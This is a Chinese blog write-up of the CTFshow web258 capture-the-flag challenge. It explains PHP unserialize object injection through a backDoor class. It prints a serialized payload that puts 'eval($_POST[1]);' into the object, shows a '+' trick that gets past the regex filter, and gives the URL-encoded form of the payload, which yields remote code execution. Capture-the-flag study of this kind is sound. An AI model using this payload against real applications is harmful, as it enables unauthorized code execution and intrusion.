CTFSHOW反序列化

最新推荐文章于 2023-07-26 17:55:34 发布
最新推荐文章于 2023-07-26 17:55:34 发布
阅读量177 收藏
点赞数
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45694932/article/details/120234912
版权

CTFSHOW web258

反序列化
正则匹配

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

这题很明显的发现 backDoor 里的getInfo 有任意代码执行函数所以就要想办法调用他来实现cat flag

if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }

这里用到反序列化unserialize()

public function __construct(){
        $this->class=new info();
    }
public function __destruct(){
        $this->class->getInfo();
    }

魔术方法
construct 是创建类时自动调用
这里我们可以将 info()改为backDoor() 来实现backDoor()的自动创建
当脚本运行结束之前又会调用__destruct()函数来实现任意代码的执行
所以这里要将 c o d e 改 为 我 们 要 执 行 的 代 码 这 里 我 们 改 为 e v a l ( code 改为我们要执行的代码这里我们改为eval( codeeval($_POST[1]);
下面来构造payload

class ctfShowUser{

    public function __construct(){
        $this->class=new backDoor();
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class backDoor{
    public $code='eval($_POST[1]);';
    public function getInfo(){
        eval($this->code);
    }
}
echo serialize(new ctfShowUser());

#O:11:"ctfShowUser":1:{s:5:"class";O:8:"backDoor":1:{s:4:"code";s:16:"eval($_POST[1]);";}}

if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }

这里还有一个正则过滤
[oc] 匹配o 或 c
\d 匹配数字
/i 表示任意大小写
中间还有两个:匹配

这里可以直接在数字前面加个+绕过

O:+11:“ctfShowUser”:1:{s:5:“class”;O:+8:“backDoor”:1:{s:4:“code”;s:16:“eval($_POST[1]);”;}}
然后urlebcode 编码 得到payload

O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A16%3A%22eval%28%24_POST%5B1%5D%29%3B%22%3B%7D%7D

这里没有用password 和username 是因为在login 函数里 只是进行了判断返回一个判断值不会影响反序列化的结果
在这里插入图片描述
最后通过修改POST来rce即可

cop_g
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java反序列化工具
11-21
Java反序列化是一种将已序列化的对象状态转换回对象的过程,它是Java平台中持久化数据的一种常见方式。在Java应用程序中,序列化用于保存对象的状态以便稍后恢复,或者在网络间传输对象。然而,这个过程也可能引入...
web安全-PHP反序列化漏洞
weixin_61956136的博客
07-10 2060
web安全-PHP反序列化漏洞
反序列化漏洞学习
weixin_64183637的博客
08-02 483
浅学反序列化
ctfshow-web258(反序列化)
m0_62094846的博客
02-24 2872
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 21:38:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__FILE__.
Ctfshow 反序列化
qq_74806534的博客
03-17 1009
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI就是服务器端模板注入SSTI也是,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后在后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,
CTFshow 反序列化 web258
Kradress的博客
12-19 734
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 21:38:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight
反序列化工具
11-14
Java反序列化是一种将已序列化的对象状态转换回对象的过程,通常用于持久化数据或在网络间传输对象。在Java中,这个过程涉及到`ObjectInputStream`类的`readObject()`方法,它能够读取由`ObjectOutputStream`的`...
c#序列化和反序列化
05-24
什么叫反序列化? 就是再把介质中的东西还原成对象,把石子还原成人的过程。 在进行这些操作的时候都需要这个可以被序列化,要能被序列化,就得给类头加[Serializable]特性。 通常网络程序为了传输安全才这么做。不...
序列化与反序列化
12-21
序列化与反序列化 概述 序列化: 就是使用流的技术将对象中的数据保存到文件中。 反序列化: 就是使用流的技术将文件中的数据读取到对象中。 使用到的流技术 序列化:ObjectOutputStream 反序列化:...
C# xml序列化和反序列化
最新发布
01-05
在C#编程中,XML序列化和反序列化是一项重要的技术,它允许我们将对象的状态转换为XML格式的数据,以及将XML数据恢复为等效的对象。这在数据存储、网络传输和配置文件等方面都有广泛的应用。以下是对这个主题的详细...
ctfshow—反序列化
cosmoslin的博客
11-15 2100
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化php 将数据序列化和反序列化会用到两个函数 serialize 将对象格式化成有序的字符串 unserialize 将字符串还原成原来的对象 序列化的目的是方便数据的传输和存储,在PHP中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的魔术方法 __construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用
ctfshow web入门 反序列化258 为何使用:+11绕过
m0_61867082的博客
07-26 190
ctfshow web入门 反序列化258 为何使用:+11绕过
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1334
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
ctfshow 反序列化
..
03-07 3306
web254 读代码后发现题目要求传入的值等于类里面的值 ?username=xxxxxx&password=xxxxxx web255 这里的话得有点改变,得让$this->返回的值为true,所以得构造一下链子如下 <?php class ctfShowUser{ public $isVip; public function __construct(){ $this->isVip=true; } } $a=new ctfShowUser()...
安恒12月赛Web题解
0verWatch的博客
12-22 2876
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
CTFSHOW-反序列化
Yb_140的博客
04-06 3522
web254 直接构造 ?username=xxxxxx&password=xxxxxx web255 这关开始使用cookie进行反序列化 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; public function checkVip(){ return $this->
CTFSHOW WEB入门反序列化
Npceer-一位网安初学者的博客
03-01 1164
最近特别懒 等开学在高强度更新其他几篇 不会写太细 反序列化入门文章找Y4爷爷 反序列化web254web255 web254 直接传 username=xxxxxx&password=xxxxxx web255 首先和254一样 传username和password 然后是需要cookie验证VIP身份 抓包构造 注:需要对分号进行url编码 引号好像不用 我当时瞎搞的 ...
ctfshow-反序列化
m0_74456293的博客
03-17 557
ctfshow-反序列化
ctfshow反序列化
09-09
引用中的代码展示了一个类`ctfshow`,其中包含了一个`__destruct`方法,该方法...综上所述,ctfshow的反序列化攻击可以通过构造恶意的序列化payload来利用`__destruct`方法或弱比较漏洞来执行任意代码或获取敏感信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值